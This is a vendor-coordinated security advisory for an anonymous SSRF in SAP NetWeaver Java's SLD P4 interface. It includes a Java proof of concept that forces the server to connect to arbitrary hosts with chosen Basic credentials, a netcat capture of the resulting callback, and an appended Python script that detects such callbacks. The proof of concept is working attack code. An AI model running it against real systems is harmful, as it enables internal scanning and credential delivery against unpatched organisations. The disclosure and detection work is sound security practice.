[ERPSCAN-18-003] SAP Java P4 SLD SSRF
Application: SAP NetWeaver
Versions Affected: SAP Netweaver 7.4, 7.5
Vendor URL: SAP
Bug: SSRF
Reported: 05.10.2017
Vendor response: 06.10.2017
Date of Public Advisory: 13.02.2018
Reference: SAP Security Note 2565622
Author: Mathieu Geli (ERPScan)
VULNERABILITY INFORMATION
Class: Missing Authentication Check
Risk: Medium
Impact: Read, modify or delete sensitive information
Remotely Exploitable: Yes
Locally Exploitable: No
CVSS Information
CVSS v3 Base Score: 8.3 / 10
CVSS v3 Base Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
AV: Attack Vector (Related exploit range) | Network (N) |
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed (C) |
C: Impact to Confidentiality | Low (L) |
I: Impact to Integrity | Low (L) |
A: Impact to Availability | Low (L) |
DESCRIPTION
An anonymous attacker can force the SAP NetWeaver Java server to send an SLD (System Landscape Directory) HTTP query, carrying attacker-chosen HTTP Basic credentials, to any host and port reachable from the server, including internal ones.
BUSINESS RISK
An attacker can use this Server-Side Request Forgery vulnerability to reach internal servers that are not directly accessible to the attacker, and to deliver credentials of the attacker's choosing to them.
VULNERABLE PACKAGES
SAP Netweaver 7.4, 7.5
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2565622.
TECHNICAL DESCRIPTION
While connecting to the Java EJB SLDJAVA_ACCESSOR_REQUEST via the P4 protocol, we noticed that the method pingSLD() of the class AbapSLDRequest is available to the J2EE_GUEST user (the identity assumed by an anonymous network client connected to the J2EE engine).
The method has the prototype pingSLD(String host, Integer port, String user, String pass). It connects to the specified host and port and passes user:pass as HTTP Basic authentication credentials. The anonymous network client controls all four parameters, so it can force the server to connect to arbitrary internal hosts and ports, port-scan the internal network from the SAP server's position, or attempt to authenticate against legitimate SLD servers with credentials of its choosing.
Proof of Concept
    import javax.rmi.PortableRemoteObject;
    import com.sap.lcrabapapi.ejb.AbapSLDRequest;
    import com.sap.lcrabapapi.ejb.AbapSLDRequestHome;
    // ctx is a JNDI InitialContext bound to the target's P4 port without credentials (J2EE_GUEST); host, port, user, pass are attacker-chosen strings
    Object o = ctx.lookup("ejb:/appName=sap.com/tc~sld~abapapi_ear, jarName=sap.com~tc~sld~abapapi_ejb.jar, beanName=SLDJAVA_ACCESSOR_REQUEST, interfaceName=com.sap.lcrabapapi.ejb.AbapSLDRequestHome");
    AbapSLDRequestHome a = (AbapSLDRequestHome) PortableRemoteObject.narrow(o, AbapSLDRequestHome.class);
    AbapSLDRequest ar = a.create();   // remote create() succeeds for the anonymous user
    ar.pingSLD(host, Integer.parseInt(port), user, pass);   // the server now connects to host:port, sending user:pass as HTTP Basic auth
The result of execution by connecting to the SAP server 172.16.30.29 and asking it to connect back to us on port 4444 (our IP is 172.16.2.179) looks like this. Note the Authorization header: ZmFrZXVzZXI6ZmFrZXBhc3M= is the base64 encoding of fakeuser:fakepass, the values we passed as user and pass, so whatever the anonymous caller supplies is delivered to the target host as HTTP Basic credentials:
    $ nc -v -l -p 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from [172.16.30.29] port 4444 [tcp/*] accepted (family 2, sport 62362)
    POST /sld/cimom HTTP/1.1
    Host: 172.16.2.179:4444
    CIMOperation: MethodCall
    Content-Length: 159
    Content-Encoding: deflate
    CIMProtocolVersion: 1.0
    SAP-CIM-Client2: SAP-CIM-Java/7.30.90
    SAP-Accepted-Cookie: JSESSIONID
    Accept: application/octet-stream, application/xml, text/xml
    Accept-Charset: UTF-8
    Authorization: Basic ZmFrZXVzZXI6ZmFrZXBhc3M=
    CIMMethod: GetClass
    SAP-PASSPORT: 2A54482A0300E600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006A6176613734352E636F72702E647365632E72755F4A34355F35323034313530346539383533363330336130313030306332666264613833333930373964393100000000024E98536303A01000C2FBDA8339079D9180373FB4609011E79BBB0000004F68B600000001000000002A54482A
    Content-Type: application/octet-stream
    CIMObject: sld/active
    Accept-Encoding: identity, deflate
    User-Agent: SAP HTTP CLIENT/6.40

    [159 bytes of deflate-compressed CIM request body (binary, not shown)]
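As an added example (not part of the original advisory or ERPScan's tooling), the following Python script shows the receiving side of the exchange above from a defender's point of view: it fingerprints SLD CIM client callbacks arriving at a listener or found in an HTTP access log, decodes the HTTP Basic credentials the NetWeaver server was made to send, and flags any callback whose Host: header is not an allow-listed SLD server. The allow-list entry sld.corp.example:50000, the source addresses and the slduser:s3cret credentials in the legitimate sample are assumptions made for the example; the forced-callback headers are copied from the capture above with the binary body omitted.

```python
import base64
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Fingerprint of NetWeaver's own SLD CIM client, as seen in the nc capture above.
SLD_PATH = "/sld/cimom"
SLD_UA_PREFIX = "SAP HTTP CLIENT/"
SLD_CLIENT_HEADER = "sap-cim-client2"

# Assumption for this example: the only SLD endpoint the Java stacks in this
# landscape are allowed to talk to. Any other Host: on an SLD callback means
# the server was pointed somewhere else, e.g. by pingSLD() over P4.
ALLOWED_SLD_HOSTS = {"sld.corp.example:50000"}


@dataclass
class SldCallback:
    src: str                   # where the request came from (the NetWeaver Java host)
    host: str                  # Host: header, i.e. where the server was told to connect
    cim_method: Optional[str]  # CIMMethod: header (GetClass in the capture above)
    user: Optional[str]        # decoded HTTP Basic user, if any
    password: Optional[str]    # decoded HTTP Basic password, if any
    suspicious: bool           # destination not in ALLOWED_SLD_HOSTS


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.1 request into (method, path, headers); the body is ignored."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head = raw.split(sep, 1)[0]
    lines = head.splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()  # header names are case-insensitive
    return method, path, headers


def decode_basic(auth: Optional[str]) -> Tuple[Optional[str], Optional[str]]:
    """Recover user and password from an HTTP Basic Authorization header value."""
    if not auth or not auth.lower().startswith("basic "):
        return None, None
    try:
        creds = base64.b64decode(auth.split(None, 1)[1], validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error (bad base64) is a ValueError subclass
        return None, None
    user, _colon, password = creds.partition(":")
    return user, password


def is_sld_client(method: str, path: str, headers: Dict[str, str]) -> bool:
    """True when the request looks like the SAP Java stack's SLD CIM client."""
    return (method == "POST" and path == SLD_PATH
            and (SLD_CLIENT_HEADER in headers
                 or headers.get("user-agent", "").startswith(SLD_UA_PREFIX)))


def analyse(src: str, raw: str) -> Optional[SldCallback]:
    """Classify one captured request; None if it is not an SLD client callback."""
    method, path, headers = parse_request(raw)
    if not is_sld_client(method, path, headers):
        return None
    user, password = decode_basic(headers.get("authorization"))
    host = headers.get("host", "")
    return SldCallback(src=src, host=host, cim_method=headers.get("cimmethod"),
                       user=user, password=password,
                       suspicious=host not in ALLOWED_SLD_HOSTS)


def triage(captures: List[Tuple[str, str]]) -> List[SldCallback]:
    """Return only the callbacks whose destination is not an allowed SLD host."""
    results = [analyse(src, raw) for src, raw in captures]
    return [r for r in results if r is not None and r.suspicious]


# Constructed samples: the first reproduces the headers of the capture above,
# the second is what a legitimate SLD request looks like under the assumed
# allow-list (assumed credentials slduser:s3cret), the third is unrelated traffic.
FORCED_CALLBACK = "\r\n".join([
    "POST /sld/cimom HTTP/1.1",
    "Host: 172.16.2.179:4444",
    "CIMOperation: MethodCall",
    "Content-Length: 159",
    "Content-Encoding: deflate",
    "CIMProtocolVersion: 1.0",
    "SAP-CIM-Client2: SAP-CIM-Java/7.30.90",
    "Authorization: Basic ZmFrZXVzZXI6ZmFrZXBhc3M=",
    "CIMMethod: GetClass",
    "CIMObject: sld/active",
    "User-Agent: SAP HTTP CLIENT/6.40",
    "",
    "<deflate body omitted>",
])
LEGIT_CALLBACK = (FORCED_CALLBACK
                  .replace("Host: 172.16.2.179:4444", "Host: sld.corp.example:50000")
                  .replace("ZmFrZXVzZXI6ZmFrZXBhc3M=", "c2xkdXNlcjpzM2NyZXQ="))
UNRELATED = "GET /index.html HTTP/1.1\r\nHost: 172.16.2.179:4444\r\n\r\n"

SAMPLE_CAPTURES = [("172.16.30.29", FORCED_CALLBACK),
                   ("172.16.30.29", LEGIT_CALLBACK),
                   ("10.1.2.3", UNRELATED)]

if __name__ == "__main__":
    for hit in triage(SAMPLE_CAPTURES):
        print(f"forced SLD callback from {hit.src} to {hit.host}: "
              f"CIMMethod={hit.cim_method}, credentials={hit.user}:{hit.password}")
```

Run as-is it reports the forced callback only. The same logic applied to the access logs of internal web servers turns the port scan described above into a signal: any service that receives a POST /sld/cimom from a NetWeaver Java host that is not its SLD, with the SAP HTTP CLIENT user agent, has been reached through this method, and the decoded Basic credentials tell you what the caller was trying to authenticate with.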